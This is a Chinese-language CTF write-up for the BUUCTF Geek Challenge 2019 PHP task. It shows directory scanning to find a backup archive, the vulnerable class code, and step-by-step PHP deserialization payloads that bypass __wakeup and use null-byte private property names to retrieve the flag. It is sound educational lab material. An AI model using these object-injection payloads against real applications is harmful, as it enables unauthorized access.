文章目录

姿势总结

姿势

提示:有一个良好的备份网站的习惯

故使用dirsearch工具扫描目录

得到的扫描结果中包含www.zip目录

通过url路径下载zip文件:

index.php中含有关键代码:

include 'class.php';

$select = $_GET['select'];

$res=unserialize(@$select);

?>

Get传参传入一个参数select,后端将其序列化

class.php:

include 'flag.php';

error_reporting(0);

class Name{

private $username = 'nonono';

private $password = 'yesyes';

public function __construct($username,$password){

$this->username = $username;

$this->password = $password;

}

function __wakeup(){

$this->username = 'guest';

}

function __destruct(){

if ($this->password != 100) {

echo "
NO!!!hacker!!!
";

echo "You name is: ";

echo $this->username;echo "
";

echo "You password is: ";

echo $this->password;echo "
";

die();

}

if ($this->username === 'admin') {

global $flag;

echo $flag;

}else{

echo "
hello my friend~~
sorry i can't give you the flag!";

die();

}

}

}

?>

construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。

分析以上代码可知,当password为100,username为admin时即可获得flag

故以get传参为跳板构造原始POC:

?select=O:4:"Name":2:{s:13:"Name username";s:5:"admin";s:13:"Name password";i:100;}

其中

4表示Name类的长度

2表示类中传入对象的个数,即username和password两个对象

13表示Name username和Name password的字符串长度

5与100表示传参的数据类型分别为string和int

接着开始完善POC:

进行反序列化之前则会先调用wakeup方法,当序列化字符串中对象个数的值大于真实个数时会跳过wakeup方法的执行,故POC可改为:

?select=O:4:"Name":3:{s:13:"Name username";s:5:"admin";s:13:"Name password";i:100;}

回显如下:

哪里还没考虑到?

如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化

故POC可改为

?select=O:4:"Name":3:{s:13:"Name%00username";s:5:"admin";s:13:"Name%00password";i:100;}

同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)

故POC改为

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

回显如下:

总结

以上为[网络安全/CTF] BUUCTF 极客大挑战 2019 PHP 解题详析,考察Dirsearch工具的使用及php反序列化知识点,读者可躬身实践。

我是秋说,我们下次见。

推荐文章

评论可见,请评论后查看内容,谢谢!!!
 您阅读本篇文章共花了: